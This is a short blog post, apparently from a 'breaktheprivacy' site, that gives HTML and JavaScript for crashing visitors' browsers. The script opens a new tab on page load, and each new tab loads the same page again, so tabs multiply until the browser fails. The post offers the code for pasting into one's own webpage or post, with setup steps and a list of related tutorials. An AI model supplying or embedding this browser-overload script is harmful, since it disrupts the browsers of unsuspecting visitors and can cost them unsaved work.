How To Crash Browser With Tab Overflow/Overload, Create your own script #breaktheprivacy
note: pop-ups should be allowed on browser to run the script, ad-blocker should be disabled
note: pop-ups should be allowed on browser to run the script, ad-blocker should be disabled
remember:
to stop-
1> just close the last tab opened fast before it creates another tab.
2> or close the browser.
Here's an example-> https://www.breaktheprivacy.com/p/browser-overload-script.html
STEPS INCLUDED:-
STEP #1. Edit Your Webpage or post in HTML
STEP #2. Copy the following code and paste it there.
<html>
<head>
<script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>
<script>
jQuery(document).ready(function () {
newTab();
});
function newTab() {
var form = document.createElement("form");
form.method = "GET";
form.action = "http://www.breaktheprivacy.com/p/browser-overload-script.html";
form.target = "_blank";
document.body.appendChild(form);
form.submit();
}
</script>
</head>
<body>
</body>
</html>
STEP #3. Click on save and Run your webpage,post. It'll refresh/reload automatically .
- How to create a webpage/post that redirect to itself i.e. refresh/ reload automatically #BreakThePrivacy
- How to create a custom Redirection for your post, web page #code BreakThePrivacy
- What is Internet Of Things(IoT)/Internet of Everything (IoE) #breaktheprivacy
- What is Cloud Computing/technology, Big Data #breaktheprivacy
- What is Machine Learning, Deep learning, Artificial Intelligence and future #breaktheprivacy
- How to Block any facebook account from liking any post,commenting,block messages and friend requests by a simple trick #breaktheprivacy
- Top 5 Free eBooks to learn C Programming #breaktheprivacy
Keep visiting